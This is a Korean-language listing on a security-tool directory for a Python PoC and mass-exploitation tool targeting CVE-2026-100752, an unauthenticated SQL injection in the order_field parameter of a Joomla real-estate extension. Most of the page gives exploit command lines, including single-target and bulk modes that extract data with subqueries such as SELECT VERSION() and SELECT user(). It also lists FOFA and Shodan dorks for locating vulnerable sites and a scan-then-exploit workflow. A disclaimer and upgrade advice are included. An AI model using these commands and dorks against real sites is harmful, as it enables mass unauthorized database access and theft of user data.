Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

피드문의개인정보© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-100752 — CVE-2026-100752에 대한 Python 3 PoC 및 대량 익스플로잇으로, OrdaSoft Joomla Real Estate Manager <=6.7.8의 order_field ORDER BY 파라미터를 통한 인증되지 않은 SQL 인젝션입니다. | Kitploit
도구/GitHubGitHub/murrez/cve-2026-100752
ReconnaissanceVulnerability ScannersVulnerability AnalysisExploitationScripting & AutomationWeb Application ExploitationInformation GatheringWeb SecurityPenetration Testing
GitHubmurrez/cve-2026-100752

CVE-2026-100752

CVE-2026-100752에 대한 Python 3 PoC 및 대량 익스플로잇으로, OrdaSoft Joomla Real Estate Manager <=6.7.8의 order_field ORDER BY 파라미터를 통한 인증되지 않은 SQL 인젝션입니다.

4일 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기

CVE-2026-100752 — OrdaSoft Real Estate Manager (Free) 인증되지 않은 SQL 인젝션

CVE-2026-100752 — OrdaSoft Real Estate Manager (Free) Joomla 확장 ≤ 6.7.8에 대한 Python 3 PoC. **6.7.9+**에서 수정됨.

PoCbithttps://pocbit.org/pocs/cve-2026-100752
Cataloghttps://pocbit.org/pocs/
Componentcom_realestatemanager
Filesite/realestatemanager.php
Parameterorder_field → ORDER BY (따옴표 없음, 허용 목록 없음)
Auth없음 (공개 목록 / 검색 / 카테고리 뷰)
CWECWE-89 SQL Injection
Also레거시 order_direction POST 인젝션 (Metasploit / 6.7.9 이전 감사)

PoC 출력 (스크린샷)

컬러 PoCbit 배너, 이어서 --mode exploit JSON 출력: exploited: true, 벡터 order_field_get, 라우트 showCategory + com_realestatemanager.

CVE-2026-100752 exploit mode — PoCbit CLI and JSON result (order_field_get, sqli_extract_ok)

예시 명령:

python poc.py -u https://TARGET --mode exploit --subquery "SELECT VERSION()"

(스크린샷은 승인된 테스트 환경에서 캡처되었습니다; 대상 URL은 PoC 검증용입니다.)


취약점 요약 (Türkçe)

**Real Estate Manager (Free)**는 Joomla에서 부동산 매물 관리를 수행하는 OrdaSoft 확장입니다. 6.7.8 및 이전 버전에서 order_field 요청 파라미터가 site/realestatemanager.php 내부의 ORDER BY 절에 직접 추가됩니다; 컬럼 이름 허용 목록, 이스케이프 또는 캐스트가 없습니다. 인증 없이 카테고리 탐색, 검색 결과 및 전체 매물 목록 쿼리가 악용될 수 있습니다.

성공적인 SQLi를 통한 데이터베이스 읽기(버전, 사용자 해시, 사이트 데이터), 권한에 따른 쓰기/삭제 및 연쇄 RCE 위험을 평가해야 합니다. 6.7.9 이상 버전으로 업그레이드하십시오 (OrdaSoft security release).


기술적 메커니즘

Joomla 프론트 컨트롤러:

GET /index.php?option=com_realestatemanager&task=showCategory&catid=50&order_field=price&order_direction=asc

CVE-2026-100752: **order_field**가 ORDER BY 컬럼/표현식을 제어합니다. 값이 바인딩이나 검증 없이 SQL에 연결되므로 에러 기반 서브쿼리와 같은 값을 주입할 수 있습니다.

영향받는 쿼리 컨텍스트 (CVE 텍스트 기준):

  1. 카테고리 탐색 (showCategory 및 관련)
  2. 검색 결과
  3. 전체 매물 목록

이 PoC:

  • com_realestatemanager 핑거프린트 (경로 + 선택적 매니페스트 버전)
  • 사이트 HTML에서 catid / Itemid 스크래핑
  • 태스크 프로브: showCategory, showSearch, showSearchResult, showRent, showBuy
  • 주요: order_field 에러 기반 GET 및 POST
  • 폴백: order_direction=asc,<injection> (역사적 벡터, 일부 빌드에서 여전히 유용)
  • Check + mass check → hits.txt
  • Exploit + mass exploit → exploited.txt (성공적인 SELECT 유출이 있는 라인)

요구 사항

cd CVE-2026-100752
pip install -r requirements.txt

사용법

단일 대상 — check

python poc.py -u https://target.example --mode check
python poc.py -u https://target.example --mode check --aggressive

--aggressive는 boolean/error 증명이 불충분할 때 SELECT VERSION()을 시도합니다.

단일 대상 — exploit

python poc.py -u https://target.example --mode exploit
python poc.py -u https://target.example --mode exploit --subquery "SELECT user()"
python poc.py -u https://target.example --mode exploit --vector order_field_get

대량 일괄 처리

python poc.py --list targets.example.txt --mode check -j 30 --output scan.jsonl --vuln-list hits.txt
python poc.py --list hits.txt --mode exploit -j 15 --subquery "SELECT VERSION()" --exploited-list exploited.txt
플래그역할
--mode exploit에러 기반 데이터 추출 (대량 지원)
--subqueryCONCAT(0x7e, …) 이중 쿼리 페이로드용 내부 SQL
--vectororder_field_get, order_field_post 또는 order_direction_post 강제
-j병렬 대상
--no-color일반 터미널

JSONL에는 pocbit, pocbit_catalog, pocbit_page, cve, **component**가 포함됩니다.


FOFA / 자산 검색 dorks

body="option=com_realestatemanager"
body="com_realestatemanager" && (body="ordasoft" || header="Joomla")
title="Real Estate" && body="com_realestatemanager"
body="/components/com_realestatemanager/"

Shodan 스타일 (지원되는 경우): http.html:com_realestatemanager

호스트 이름을 targets.txt로 내보내고 (한 줄에 URL 하나), 승인된 부동산에 대해서만 check → hits → exploit을 수행하십시오.


버전 탐지

매니페스트 (노출된 경우):

  • /administrator/components/com_realestatemanager/realestatemanager.xml

버전이 ≤ 6.7.8이면 → likely_vulnerable_version. ≥ 6.7.9이면 → patched_version (exploit이 여전히 실패할 수 있음).


관련 CVE (동일 릴리스 트레인)

CVE유형수정 버전
CVE-2026-100752인증되지 않은 SQLi (order_field)6.7.9
CVE-2026-100753반사형 XSS (공개 매물 뷰)6.7.9

동일 벤더 배치 (2026년 9월): Vehicle Manager 및 기타 OrdaSoft 확장이 별도의 CVE를 받았습니다 — 실행 중인 모든 OrdaSoft 컴포넌트를 패치하십시오.


참고 자료

  • PoCbit CVE-2026-100752
  • CVE.report CVE-2026-100752
  • JoomClub — six flaws in three OrdaSoft extensions (2026년 9월)
  • Metasploit: auxiliary/gather/joomla_com_realestatemanager_sqli (레거시 order_direction POST)

법적 고지

승인된 보안 테스트 및 패치 검증 전용입니다. 허가 없이 시스템에 사용하지 마십시오.


GitHub 저장소 설명

CVE-2026-100752 PoC: OrdaSoft Joomla Real Estate Manager (Free) <=6.7.8 unauth SQLi via order_field ORDER BY (com_realestatemanager). Colored check + mass exploit, version fingerprint, PoCbit https://pocbit.org/pocs/cve-2026-100752
도구 다운로드